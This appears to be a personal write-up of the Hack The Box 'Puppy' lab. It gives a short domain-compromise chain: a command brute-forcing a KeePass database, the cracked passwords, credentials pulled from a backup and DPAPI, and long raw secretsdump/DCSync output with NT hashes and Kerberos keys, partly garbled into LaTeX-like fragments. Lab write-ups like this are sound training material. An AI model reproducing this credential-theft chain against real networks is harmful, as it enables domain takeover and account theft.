Notes

---

adam.silver is prob the user I have to get

ant.edwards also too maybe both are remote mgm users

steph.cooper_adm@PUPPY.HTB ← this guy has domain admin

dump keepass database

./bin/python3 bfkeepass.py -d /home/ew/box/puppy/loot/recovery.kdbx -w /home/ew/Documents/wordlists/rockyou.txt -o [] Running bfkeepass [] Starting bruteforce process… [!] Success! Database password: liverpool [>] Dumping entries…

[>] Title: JAMIE WILLIAMSON [>] Username: None [>] Password: JamieLove2025! [>] URL: puppy.htb [>] Notes: None

[>] Title: ADAM SILVER [>] Username: None [>] Password: HJKL2025! [>] URL: puppy.htb [>] Notes: None

[>] Title: ANTONY C. EDWARDS [>] Username: None [>] Password: Antman2025! [>] URL: puppy.htb [>] Notes: None

[>] Title: STEVE TUCKER [>] Username: None [>] Password: Steve2025! [>] URL: puppy.htb [>] Notes: None

[>] Title: SAMUEL BLAKE [>] Username: None [>] Password: ILY2025! [>] URL: puppy.htb [>] Notes: None

[>] Entry dump complete. [] Stopping bruteforce process. [] Done.

credentials that worked

ant.edwards Antman2025!

[>] Title: ANTONY C. EDWARDS [>] Username: None [>] Password: Antman2025! [>] URL: puppy.htb [>] Notes: None

found this in the backup file cn=steph.cooper,dc=puppy,dc=htb ChefSteph2025!

to show all files in a folder dir -Force

got this from dpapi → credential files [CREDENTIAL] LastWritten : 2025-03-08 15:54:29 Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH) Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE) Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD) Target : Domain:target=PUPPY.HTB Description : Unknown : Username : steph.cooper_adm Unknown : FivethChipOnItsWay2025!

secretsdump steph.cooper_adm has DCSync permission on domain

[] Service RemoteRegistry is in stopped state [] Starting service RemoteRegistry [] Target system bootKey: 0xa943f13896e3e21f6c4100c7da9895a6 [] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:9c541c389e2904b9b112f599fd6b333d::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn’t have hash information. [] Dumping cached domain logon information (domain/username:hash) [] Dumping LSA Secrets [] $MACHINE.ACCPUPPY\text{DC}$:aes256-cts-hmac-sha1-96:f4f395e28f0933cac28e02947bc68ee11b744ee32b6452dbf795d9ec85ebda45 PUPPY\DC$:aes128-cts-hmac-sha1-96:4d596c7c83be8cd71563307e496d8c30PUPPY\text{DC}$:des-cbc-md5:54e9a11619f8b9b5 PUPPY\DC$:plai{n}_{p}asswor{d}_{h}ex:84880c04e892448b6419dda6b840df09465ffda259692f44c2b3598d8f6b9bc1b0bc37b17528d18a1e10704932997674cbe6b89fd8256d5dfeaa306dc59f15c1834c9ddd333af63b249952730bf256c3afb34a9cc54320960e7b3783746ffa1a1528c77faa352a82c13d7c762c34c6f95b4bbe04f9db6164929f9df32b953f0b419fbec89e2ecb268ddcccb4324a969a1997ae3c375cc865772baa8c249589e1757c7c36a47775d2fc39e566483d0fcd48e29e6a384dc668228186a2196e48c7d1a8dbe6b52fc2e1392eb92d100c46277e1b2f43d5f2b188728a3e6e5f03582a9632da8acfc4d992899f3b64fe120e13PUPPY\text{DC}$:aad3b435b51404eeaad3b435b51404ee:d5047916131e6ba897f975fc5f19c8df::: [] DPAPI_SYSTEM dpapi_machinekey:0xc21ea457ed3d6fd425344b3a5ca40769f14296a3 dpapi_userkey:0xcb6a80b44ae9bdd7f368fb674498d265d50e29bf [] NLKM 0000 DD 1B A5 A0 33 E7 A0 56 1C 3F C3 F5 86 31 BA 09 ....3..V.?...1.. 0010 1A C4 D4 6A 3C 2A FA 15 26 06 3B 93 E0 66 0F 7A ...j<*..&.;..f.z 0020 02 9A C7 2E 52 79 C1 57 D9 0C D3 F6 17 79 EF 3F ....Ry.W.....y.? 0030 75 88 A3 99 C7 E0 2B 27 56 95 5C 6B 85 81 D0 ED u.....+'V.\k.... NLKM:dd1ba5a033e7a0561c3fc3f58631ba091ac4d46a3c2afa1526063b93e0660f7a029ac72e5279c157d90cd3f61779ef3f7588a399c7e02b2756955c6b8581d0ed [] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb0edc15e49ceb4120c7bd7e6e65d75b::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a4f2989236a639ef3f766e5fe1aad94a::: PUPPY.HTB\levi.james:1103:aad3b435b51404eeaad3b435b51404ee:ff4269fdf7e4a3093995466570f435b8::: PUPPY.HTB\ant.edwards:1104:aad3b435b51404eeaad3b435b51404ee:afac881b79a524c8e99d2b34f438058b::: PUPPY.HTB\adam.silver:1105:aad3b435b51404eeaad3b435b51404ee:a7d7c07487ba2a4b32fb1d0953812d66::: PUPPY.HTB\jamie.williams:1106:aad3b435b51404eeaad3b435b51404ee:bd0b8a08abd5a98a213fc8e3c7fca780::: PUPPY.HTB\steph.cooper:1107:aad3b435b51404eeaad3b435b51404ee:b261b5f931285ce8ea01a8613f09200b::: PUPPY.HTB\steph.cooper_adm:1111:aad3b435b51404eeaad3b435b51404ee:ccb206409049bc53502039b80f3f1173::: DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5047916131e6ba897f975fc5f19c8df:::[\ast ]KerberoskeysgrabbedAdministrator:aes256-cts-hmac-sha1-96:c0b23d37b5ad3de31aed317bf6c6fd1f338d9479def408543b85bac046c596c0Administrator:aes128-cts-hmac-sha1-96:2c74b6df3ba6e461c9d24b5f41f56dafAdministrator:des-cbc-md5:20b9e03d6720150dkrbtgt:aes256-cts-hmac-sha1-96:f2443b54aed754917fd1ec5717483d3423849b252599e59b95dfdcc92c40fa45krbtgt:aes128-cts-hmac-sha1-96:60aab26300cc6610a05389181e034851krbtgt:des-cbc-md5:5876d051f78faebaPUPPY.HTB\text{levi}.james:aes256-cts-hmac-sha1-96:2aad43325912bdca0c831d3878f399959f7101bcbc411ce204c37d585a6417ecPUPPY.HTB\text{levi}.james:aes128-cts-hmac-sha1-96:661e02379737be19b5dfbe50d91c4d2fPUPPY.HTB\text{levi}.james:des-cbc-md5:efa8c2feb5cb6da8PUPPY.HTB\text{ant}.edwards:aes256-cts-hmac-sha1-96:107f81d00866d69d0ce9fd16925616f6e5389984190191e9cac127e19f9b70fcPUPPY.HTB\text{ant}.edwards:aes128-cts-hmac-sha1-96:a13be6182dc211e18e4c3d658a872182PUPPY.HTB\text{ant}.edwards:des-cbc-md5:835826ef57bafbc8PUPPY.HTB\text{adam}.silver:aes256-cts-hmac-sha1-96:670a9fa0ec042b57b354f0898b3c48a7c79a46cde51c1b3bce9afab118e569e6PUPPY.HTB\text{adam}.silver:aes128-cts-hmac-sha1-96:5d2351baba71061f5a43951462ffe726PUPPY.HTB\text{adam}.silver:des-cbc-md5:643d0ba43d54025ePUPPY.HTB\text{jamie}.williams:aes256-cts-hmac-sha1-96:aeddbae75942e03ac9bfe92a05350718b251924e33c3f59fdc183e5a175f5fb2PUPPY.HTB\text{jamie}.williams:aes128-cts-hmac-sha1-96:d9ac02e25df9500db67a629c3e5070a4PUPPY.HTB\text{jamie}.williams:des-cbc-md5:cb5840dc1667b615PUPPY.HTB\text{steph}.cooper:aes256-cts-hmac-sha1-96:799a0ea110f0ecda2569f6237cabd54e06a748c493568f4940f4c1790a11a6aaPUPPY.HTB\text{steph}.cooper:aes128-cts-hmac-sha1-96:cdd9ceb5fcd1696ba523306f41a7b93ePUPPY.HTB\text{steph}.cooper:des-cbc-md5:d35dfda40d38529bPUPPY.HTB\text{steph}.coope{r}_{a}dm:aes256-cts-hmac-sha1-96:a3b657486c089233675e53e7e498c213dc5872d79468fff14f9481eccfc05ad9PUPPY.HTB\text{steph}.coope{r}_{a}dm:aes128-cts-hmac-sha1-96:c23de8b49b6de2fc5496361e4048cf62PUPPY.HTB\text{steph}.coope{r}_{a}dm:des-cbc-md5:6231015d381ab691DC$:aes256-cts-hmac-sha1-96:f4f395e28f0933cac28e02947bc68ee11b744ee32b6452dbf795d9ec85ebda45 DC$:aes128-cts-hmac-sha1-96:4d596c7c83be8cd71563307e496d8c30DC$:des-cbc-md5:7f044607a8dc9710